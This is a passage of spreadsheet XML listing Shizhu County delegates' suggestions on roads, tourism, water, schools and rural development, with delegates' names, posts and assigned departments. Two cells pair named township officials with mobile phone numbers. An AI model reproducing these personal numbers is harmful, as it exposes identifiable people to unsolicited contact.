    <t xml:space="preserve">关于将“贵和工作室”建设、运行经费纳入县财政预算的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县委政法委</t>
  </si>
  <si>
    <t xml:space="preserve">县财政局、县公安局</t>
  </si>
  <si>
    <t xml:space="preserve">谭  卫</t>
  </si>
  <si>
    <t xml:space="preserve">枫木镇党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于招商引资综合开发枫木镇•枫木台与杨东河的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县发展改革委、县投资促进中心</t>
  </si>
  <si>
    <t xml:space="preserve">罗  林</t>
  </si>
  <si>
    <t xml:space="preserve">县人大农业与农村委主任委员</t>
  </si>
  <si>
    <t xml:space="preserve">关于乡村产业振兴的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县乡村振兴局、县投资促进中心、县商务委</t>
  </si>
  <si>
    <t xml:space="preserve">陈  云</t>
  </si>
  <si>
    <t xml:space="preserve">县人大农业与农村委副主任委员</t>
  </si>
  <si>
    <t xml:space="preserve">关于下路街道白鹤村陆池居民点环境污染治理的建议</t>
  </si>
  <si>
    <t xml:space="preserve">下路街道</t>
  </si>
  <si>
    <t xml:space="preserve">周波涛</t>
  </si>
  <si>
    <t xml:space="preserve">黄水镇人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快黄水场镇老旧房屋改造，提升黄水形象的建议</t>
  </si>
  <si>
    <t xml:space="preserve">黄水镇、县供销社</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">关于将冷水高铁动车站</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="方正仿宋_GBK"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">-</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">枫木镇双塘村</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="方正仿宋_GBK"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">-</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">枫木新场镇快速通道纳入“十四五”规划的建议</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">县发展改革委、县规划自然资源局</t>
  </si>
  <si>
    <t xml:space="preserve">沈思银</t>
  </si>
  <si>
    <t xml:space="preserve">冷水镇人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于打造冷水镇太平槽沿线田园综合体的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县乡村振兴局、县发展改革委、县生态环境局</t>
  </si>
  <si>
    <t xml:space="preserve">关于开展县域高速公路沿线环境综合治理工作的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县委宣传部、县城市管理局、县农业农村委、县文化旅游委、高速公路沿线乡镇（街道）</t>
  </si>
  <si>
    <t xml:space="preserve">张继状</t>
  </si>
  <si>
    <t xml:space="preserve">石柱中学校长</t>
  </si>
  <si>
    <t xml:space="preserve">关于解决我县高完中学校发展资金困难的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县发展改革委、县财政局、县人力社保局</t>
  </si>
  <si>
    <t xml:space="preserve">王小军</t>
  </si>
  <si>
    <t xml:space="preserve">县农业特色产业发展中心主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于加强乡镇畜牧兽医工作人员配置的建议</t>
  </si>
  <si>
    <t xml:space="preserve">陈  伟</t>
  </si>
  <si>
    <t xml:space="preserve">县公安局刑侦大队大队长</t>
  </si>
  <si>
    <t xml:space="preserve">关于坚决制止占道施工问题的建议</t>
  </si>
  <si>
    <t xml:space="preserve">张乾方</t>
  </si>
  <si>
    <t xml:space="preserve">彭平安</t>
  </si>
  <si>
    <t xml:space="preserve">黄水镇黄连社区党支部书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于切实解决黄水镇黄连社区危房改造用地的建议</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">关于请求将原国营石柱黄连总公司各农业公司</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">2005</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">年职工身份置换改制人员纳入享受国有企业职工下岗分流待遇的建议</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">县国资事务中心、县林业局</t>
  </si>
  <si>
    <t xml:space="preserve">关于更好的完成重庆市现代农业产业园项目建设，请求相关部门提前介入解决各黄连企业设施农用地需求的建议</t>
  </si>
  <si>
    <t xml:space="preserve">陈德勇</t>
  </si>
  <si>
    <t xml:space="preserve">陈田螺餐饮文化有限公司董事长</t>
  </si>
  <si>
    <t xml:space="preserve">关于把石柱莼菜鱼打造为石柱形象菜品的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于保障全县人民饮用水安全的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县市场监管局</t>
  </si>
  <si>
    <t xml:space="preserve">县水利局、县生态环境局</t>
  </si>
  <si>
    <t xml:space="preserve">关于加大力度支持餐饮行业渡过难关的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县金融工作事务中心</t>
  </si>
  <si>
    <t xml:space="preserve">关于着力五个提升、推动康养美食高质量发展的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县发展改革委、县文化旅游委</t>
  </si>
  <si>
    <t xml:space="preserve">马  颖</t>
  </si>
  <si>
    <t xml:space="preserve">县纪委驻公安局纪检组</t>
  </si>
  <si>
    <t xml:space="preserve">关于整改太白桥积水问题的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于在党员干部中落实民法典中离婚部分的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县妇联、县法院、县民政局</t>
  </si>
  <si>
    <t xml:space="preserve">秦  伟</t>
  </si>
  <si>
    <t xml:space="preserve">石柱供电公司运检部专责</t>
  </si>
  <si>
    <t xml:space="preserve">关于对森林草原配电线路火灾防范的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县经济信息委</t>
  </si>
  <si>
    <t xml:space="preserve">县林业局、县供电公司</t>
  </si>
  <si>
    <t xml:space="preserve">秦玉林</t>
  </si>
  <si>
    <t xml:space="preserve">县卫健委基层医疗卫生服务中心主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于建设黄水镇从“黄水中学沿老场镇背后至镇中心医院环道”的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">黄水镇</t>
  </si>
  <si>
    <t xml:space="preserve">县发展改革委、县交通局</t>
  </si>
  <si>
    <t xml:space="preserve">周绪昌</t>
  </si>
  <si>
    <t xml:space="preserve">黄水镇七龙社区党支部书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于切实加快黄水及周边旅游景点设施建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">黄水旅管会</t>
  </si>
  <si>
    <t xml:space="preserve">黄水镇、冷水镇、枫木镇</t>
  </si>
  <si>
    <t xml:space="preserve">苟小玲</t>
  </si>
  <si>
    <t xml:space="preserve">枫木镇党政办主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于启动冷水—枫木老场镇道路油化，解决冷水至黄水旅游旺季道路拥堵的建议</t>
  </si>
  <si>
    <t xml:space="preserve">赵纯金</t>
  </si>
  <si>
    <t xml:space="preserve">六塘乡人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于清理行道树，清除安全隐患的建议</t>
  </si>
  <si>
    <t xml:space="preserve">孙学科</t>
  </si>
  <si>
    <t xml:space="preserve">下路街道金彰社区主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于提升金彰新时代形象，改善居民生活的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县工业园区管委会</t>
  </si>
  <si>
    <t xml:space="preserve">县投资促进中心、县规划自然资源局</t>
  </si>
  <si>
    <t xml:space="preserve">谭  勇</t>
  </si>
  <si>
    <t xml:space="preserve">下路街道湖海村委会主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于加强排污管理和保护龙河水质的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">县生态环境局、县水利局</t>
  </si>
  <si>
    <t xml:space="preserve">金广林</t>
  </si>
  <si>
    <t xml:space="preserve">六塘乡党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于六塘、三星、下路沿线景点装袋打造成一条旅游环线的建议</t>
  </si>
  <si>
    <t xml:space="preserve">隆文波</t>
  </si>
  <si>
    <t xml:space="preserve">关于对六塘场镇实施整体搬迁，助推六塘振兴的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县住房城乡建委、六塘乡</t>
  </si>
  <si>
    <t xml:space="preserve">向大祥</t>
  </si>
  <si>
    <t xml:space="preserve">三星乡党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于开发大风门景区（刀背梁）的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">县文化旅游委、县经济信息委</t>
  </si>
  <si>
    <t xml:space="preserve">秦发林</t>
  </si>
  <si>
    <t xml:space="preserve">三星乡人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于建设“重庆最美梯田”田园综合体的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县文化旅游委、三星乡</t>
  </si>
  <si>
    <t xml:space="preserve">孙苠方</t>
  </si>
  <si>
    <t xml:space="preserve">重庆万寿山中蜂产品开发有限公司经理</t>
  </si>
  <si>
    <t xml:space="preserve">关于加强对困难民营企业支持，帮助企业渡过难关的建议</t>
  </si>
  <si>
    <t xml:space="preserve">中益乡、县金融工作事务中心、县商务委</t>
  </si>
  <si>
    <t xml:space="preserve">关于将三星乡撤乡建镇的建议</t>
  </si>
  <si>
    <t xml:space="preserve">潘联盟</t>
  </si>
  <si>
    <t xml:space="preserve">下路街道党工委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于明确各街道行政执法职能，提升街道依法行政能力的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于支持下路、六塘、三星打造城周旅游综合体的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于加大招商力度，形成全民招商、爱商氛围的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县投资促进中心</t>
  </si>
  <si>
    <t xml:space="preserve">马书德</t>
  </si>
  <si>
    <t xml:space="preserve">宏达畜产品公司董事长</t>
  </si>
  <si>
    <t xml:space="preserve">关于下路街道的小学毕业生应与南宾、万安街道小学毕业生同等摇号就读的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">周淑华</t>
  </si>
  <si>
    <t xml:space="preserve">县人大常委会专职委员</t>
  </si>
  <si>
    <t xml:space="preserve">关于加强春节期间县城范围内烟花爆竹燃放时间管理的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县城市管理局、县生态环境局</t>
  </si>
  <si>
    <t xml:space="preserve">彭德金</t>
  </si>
  <si>
    <t xml:space="preserve">关于恢复开通县城到城北社区菜地坝公交车的建议</t>
  </si>
  <si>
    <t xml:space="preserve">秦河龙</t>
  </si>
  <si>
    <t xml:space="preserve">下路街道人大工委主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于加强城周经济发展的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县发展改革委、县城市管理局</t>
  </si>
  <si>
    <t xml:space="preserve">郑鹏程</t>
  </si>
  <si>
    <t xml:space="preserve">下路街道红岩社区党支部书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于修通最后一公里，加快下路融城步伐的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县交通局、县规划自然资源局、下路街道</t>
  </si>
  <si>
    <t xml:space="preserve">刘海荣</t>
  </si>
  <si>
    <t xml:space="preserve">下路街道白鹤村支书</t>
  </si>
  <si>
    <t xml:space="preserve">关于解决白鹤村旅游产业发展长期用水的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县文化旅游委、下路街道</t>
  </si>
  <si>
    <t xml:space="preserve">谭正富</t>
  </si>
  <si>
    <t xml:space="preserve">下路街道上进村支书</t>
  </si>
  <si>
    <t xml:space="preserve">关于建设石柱至丰都的旅游大道工程的建议</t>
  </si>
  <si>
    <t xml:space="preserve">刘  伟</t>
  </si>
  <si>
    <t xml:space="preserve">下路街道天泉村主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于处理农村闲置房的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">关于解决白鹤村发展旅游产业配套公路硬化的建议</t>
  </si>
  <si>
    <t xml:space="preserve">沈普翠</t>
  </si>
  <si>
    <t xml:space="preserve">县农委农环战站长</t>
  </si>
  <si>
    <t xml:space="preserve">关于提高我县企业科技创能力促进高质量发展的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县人力社保局、县农业农村委、县税务局</t>
  </si>
  <si>
    <t xml:space="preserve">邹邦文
马远生</t>
  </si>
  <si>
    <t xml:space="preserve">龙沙镇党委书记
龙沙镇人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于对龙沙河综合整治的建议</t>
  </si>
  <si>
    <t xml:space="preserve">18996915900
13594934900</t>
  </si>
  <si>
    <t xml:space="preserve">马远生</t>
  </si>
  <si>
    <t xml:space="preserve">龙沙镇人大主席</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">关于新建国道</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">211</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">龙沙场镇过境公路的建议</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">谭海波</t>
  </si>
  <si>
    <t xml:space="preserve">悦崃镇党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于加大打造古城坝景区并纳入县政府重点招商的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于解决悦崃镇场镇居民饮用水的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于修建千野草场到东方红水库公路的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县生态环境局、县水利局、县林业局、县文化旅游委、悦崃镇</t>
  </si>
  <si>
    <t xml:space="preserve">王雪华</t>
  </si>
  <si>
    <t xml:space="preserve">悦崃镇人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于建立财政投资工程质量监理统一机构的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县国资集团、县农旅集团、县工业集团</t>
  </si>
  <si>
    <t xml:space="preserve">陈  云
马世勇</t>
  </si>
  <si>
    <t xml:space="preserve">三益乡党委书记
三益乡人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于三益乡新田村境内县道公路行道树砍伐排危的建议</t>
  </si>
  <si>
    <t xml:space="preserve">15923614176
13452250111</t>
  </si>
  <si>
    <t xml:space="preserve">关于三益乡与桥头镇交界路段公路边坡安全治理的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于三益乡与桥头镇之间增设客运班车的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于石柱县现有农产品深加工及企业可持续发展和农业产业进程的建议  </t>
  </si>
  <si>
    <t xml:space="preserve">县康养中心</t>
  </si>
  <si>
    <t xml:space="preserve">谭银河</t>
  </si>
  <si>
    <t xml:space="preserve">龙沙镇人大副主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于改扩建龙沙镇永丰村沱池坝河渠的建议</t>
  </si>
  <si>
    <t xml:space="preserve">B</t>
  </si>
  <si>
    <t xml:space="preserve">关于解决龙沙场镇长期饮水难的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于整改科华水泥厂对面公路段安全隐患的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县经济信息委、县公安局</t>
  </si>
  <si>
    <t xml:space="preserve">谭建兰</t>
  </si>
  <si>
    <t xml:space="preserve">重庆谭妹子公司董事长</t>
  </si>
  <si>
    <t xml:space="preserve">关于提升苹果园公园品质的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于对乡镇敬老院进行供商养结合改革的建议</t>
  </si>
  <si>
    <t xml:space="preserve">罗  靖</t>
  </si>
  <si>
    <t xml:space="preserve">县委办信息科干部</t>
  </si>
  <si>
    <t xml:space="preserve">关于加强普惠性幼儿园建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">秦晓华</t>
  </si>
  <si>
    <t xml:space="preserve">鱼池镇党委书记</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">关于将黄水</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">-</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">鱼池</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">-</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">悦崃</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">-</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">龙沙纳入乡村振兴示范带的建议</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">罗先贵</t>
  </si>
  <si>
    <t xml:space="preserve">县人大常委会预算工委主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于加强公交站台管理维护的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于县公安局坚持以人为本设置县人民医院门前机动车转向道口及斑马线的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于在都督大道规划建设农贸市场的建议</t>
  </si>
  <si>
    <t xml:space="preserve">周华榕</t>
  </si>
  <si>
    <t xml:space="preserve">李树林</t>
  </si>
  <si>
    <t xml:space="preserve">县人大常委会人事代表工委主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于加强旗山亲水平台市政设施建设和管理的建议</t>
  </si>
  <si>
    <t xml:space="preserve">秦建红</t>
  </si>
  <si>
    <t xml:space="preserve">县人大监察和法制委主任委员</t>
  </si>
  <si>
    <t xml:space="preserve">关于完善太白岩公园基础设施的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于在县城城南花园小区前门公交车站台设置候车亭的建议</t>
  </si>
  <si>
    <t xml:space="preserve">陈志泰</t>
  </si>
  <si>
    <t xml:space="preserve">县人大常委会教科文卫工委主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于增加贯通新城区连接二环路（万寿大道）公交线路的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于优化调整城区小学课后服务的建议</t>
  </si>
  <si>
    <t xml:space="preserve">谭金权</t>
  </si>
  <si>
    <t xml:space="preserve">重庆律缘律师事务所</t>
  </si>
  <si>
    <t xml:space="preserve">关于开通石柱县城至中益乡建峰村客运班车的建议</t>
  </si>
  <si>
    <t xml:space="preserve">崔坤平</t>
  </si>
  <si>
    <t xml:space="preserve">临溪镇高建社区党支部书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于村组道路占道电杆迁移的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县交通局、县经济信息委</t>
  </si>
  <si>
    <t xml:space="preserve">关于恢复临溪法庭的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县法院</t>
  </si>
  <si>
    <t xml:space="preserve">崔  龙</t>
  </si>
  <si>
    <t xml:space="preserve">临溪镇人民政府扶贫专干</t>
  </si>
  <si>
    <t xml:space="preserve">关于加强农村道路管理的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县经济信息委、县水利局、县财政局、各乡镇（街道）</t>
  </si>
  <si>
    <t xml:space="preserve">关于设立巩固脱贫成果基金的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">关于完善县城公交站台建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县城市管理局、县规划自然资源局、县公安局</t>
  </si>
  <si>
    <t xml:space="preserve">崔雪艳</t>
  </si>
  <si>
    <t xml:space="preserve">临溪镇红阳村综合治理专干</t>
  </si>
  <si>
    <t xml:space="preserve">关于将孕前优生优育检查对象纳入文件规范的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">付  丹</t>
  </si>
  <si>
    <t xml:space="preserve">大歇镇政府党群办干部</t>
  </si>
  <si>
    <t xml:space="preserve">关于将大歇镇大歇村、双会村“撤村建居”的建议</t>
  </si>
  <si>
    <t xml:space="preserve">大歇镇</t>
  </si>
  <si>
    <t xml:space="preserve">马泽奎</t>
  </si>
  <si>
    <t xml:space="preserve">大歇镇大歇村党支部书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于撤销重庆顺昌矿产开发有限公司建设凤凰沟水电站立项批文的建议</t>
  </si>
  <si>
    <t xml:space="preserve">马泽玉</t>
  </si>
  <si>
    <t xml:space="preserve">县文化馆干部</t>
  </si>
  <si>
    <t xml:space="preserve">关于提倡孩子进行校外实践活动的建议</t>
  </si>
  <si>
    <t xml:space="preserve">宋一芬</t>
  </si>
  <si>
    <t xml:space="preserve">大歇镇大歇村综合服务专干</t>
  </si>
  <si>
    <t xml:space="preserve">关于开通石柱至大歇镇公交车的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">关于野猪等野生动物损害农作物的损失纳入政府补偿或商业保险的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">谭建伟</t>
  </si>
  <si>
    <t xml:space="preserve">临溪镇人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于加大通讯基站建设力度的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">谭  英</t>
  </si>
  <si>
    <t xml:space="preserve">大歇镇人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于搬迁埋设在大歇镇双笕河道内天然气管线的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县经济信息委、县发展改革委</t>
  </si>
  <si>
    <t xml:space="preserve">王  东</t>
  </si>
  <si>
    <t xml:space="preserve">河嘴乡党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于加大对“最偏远乡镇”干部交流力度的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于将河嘴乡纳入县级乡村振兴示范点建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县乡村振兴局、县文化旅游委、县发展改革委</t>
  </si>
  <si>
    <t xml:space="preserve">宋丽军</t>
  </si>
  <si>
    <t xml:space="preserve">大歇镇党群办干部</t>
  </si>
  <si>
    <t xml:space="preserve">关于合理利用农村闲置房发展乡村民宿的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县农业农村委、县人大常委会办公室</t>
  </si>
  <si>
    <t xml:space="preserve">向源源</t>
  </si>
  <si>
    <t xml:space="preserve">关于尽快打通县城至万寿山景区连接路的建议</t>
  </si>
  <si>
    <t xml:space="preserve">赵  清</t>
  </si>
  <si>
    <t xml:space="preserve">临溪镇党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于大力破除丧葬陋习的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县委政法委、县公安局</t>
  </si>
  <si>
    <t xml:space="preserve">关于抢抓新机遇推动临溪片区提速发展的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县文化旅游委、县农业农村委、县发展改革委</t>
  </si>
  <si>
    <t xml:space="preserve">钟华碧</t>
  </si>
  <si>
    <t xml:space="preserve">临溪镇花厅村综合治理专干</t>
  </si>
  <si>
    <t xml:space="preserve">关于保护利用红色遗产的建议</t>
  </si>
  <si>
    <t xml:space="preserve">周建平</t>
  </si>
  <si>
    <t xml:space="preserve">王家乡人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于对王家乡场镇实施油化改造的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">关于实施西乐坪三路红军战斗遗址农旅结合的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">皮昭德</t>
  </si>
  <si>
    <t xml:space="preserve">关于完善凤凰山公墓道路等设施的建议</t>
  </si>
  <si>
    <t xml:space="preserve">彭永虎</t>
  </si>
  <si>
    <t xml:space="preserve">马武镇党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于将马武片区作为县域经济重要增长极进行打造的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县农业农村委、县规划自然资源局、县文化旅游委、县林业局、县商务委、县经济信息委</t>
  </si>
  <si>
    <t xml:space="preserve">马武镇党委书记 </t>
  </si>
  <si>
    <t xml:space="preserve">关于在马武镇设立新型建材加工基地的建议</t>
  </si>
  <si>
    <t xml:space="preserve">刘  平</t>
  </si>
  <si>
    <t xml:space="preserve">马武镇人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于加大镇内道路改扩建及安保工程倾斜力度的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于建设石彭路银挑水至高速路入口公路的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于解决乡镇财政收支矛盾的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于修建马武中学—螺丝塘—高速路匝道口快速通道的建议</t>
  </si>
  <si>
    <t xml:space="preserve">陈传亚</t>
  </si>
  <si>
    <t xml:space="preserve">马武镇石流村综合服务专干</t>
  </si>
  <si>
    <t xml:space="preserve">关于设立场镇市政执法大队的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于加大对场镇建设管理维护支持力度的建议</t>
  </si>
  <si>
    <t xml:space="preserve">谭朝和</t>
  </si>
  <si>
    <t xml:space="preserve">飞水岩一级电站站长</t>
  </si>
  <si>
    <t xml:space="preserve">关于修建马武场镇河堤的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于增补安装农村自然组应急广播的建议</t>
  </si>
  <si>
    <t xml:space="preserve">李守宝</t>
  </si>
  <si>
    <t xml:space="preserve">重庆晒旺华宝生物科技有限公司总经理</t>
  </si>
  <si>
    <t xml:space="preserve">关于发展高效山地农业产业助推乡村振兴发展的建议</t>
  </si>
  <si>
    <t xml:space="preserve">刘光华</t>
  </si>
  <si>
    <t xml:space="preserve">新乐乡党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于践行康养理念，助推乡村振兴的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县发展改革委、县农业农村委</t>
  </si>
  <si>
    <t xml:space="preserve">县文化旅游委、县商务委、县体育运动中心、县住房城乡建委、县卫生健康委、县投资促进中心</t>
  </si>
  <si>
    <t xml:space="preserve">陆安元</t>
  </si>
  <si>
    <t xml:space="preserve">洗新乡人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于洗新同天槽至场镇公路进行油化提前下计划的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于修通洗新乡保合村瑶罐厂至六条路的建议</t>
  </si>
  <si>
    <t xml:space="preserve">蒲  实</t>
  </si>
  <si>
    <t xml:space="preserve">洗新乡党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于沿石别路沿线联片打造乡村振兴示范带的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县规划自然资源局、县林业局、县农业农村委</t>
  </si>
  <si>
    <t xml:space="preserve">冉树洪</t>
  </si>
  <si>
    <t xml:space="preserve">新乐乡人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于加强农村劳动力就业技能培训工作的建议</t>
  </si>
  <si>
    <t xml:space="preserve">王  平</t>
  </si>
  <si>
    <t xml:space="preserve">龙潭乡人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于新建龙潭至黄鹤镇旅游观光路的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县文化旅游委、黄鹤镇、龙潭乡</t>
  </si>
  <si>
    <t xml:space="preserve">杨晓红</t>
  </si>
  <si>
    <t xml:space="preserve">黄鹤镇党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于推进马武片区经济发展的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县文化旅游委
县交通局
县农业农村委</t>
  </si>
  <si>
    <t xml:space="preserve">周永凡</t>
  </si>
  <si>
    <t xml:space="preserve">黄鹤镇人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于打造黄鹤镇茶旅文化融合发展的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县文化旅游委
县发展改革委
县农业农村委</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快七曜山地质公园开发利用建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县文化旅游委
县发展改革委</t>
  </si>
  <si>
    <t xml:space="preserve">向朝虎</t>
  </si>
  <si>
    <t xml:space="preserve">龙潭乡党委书记</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
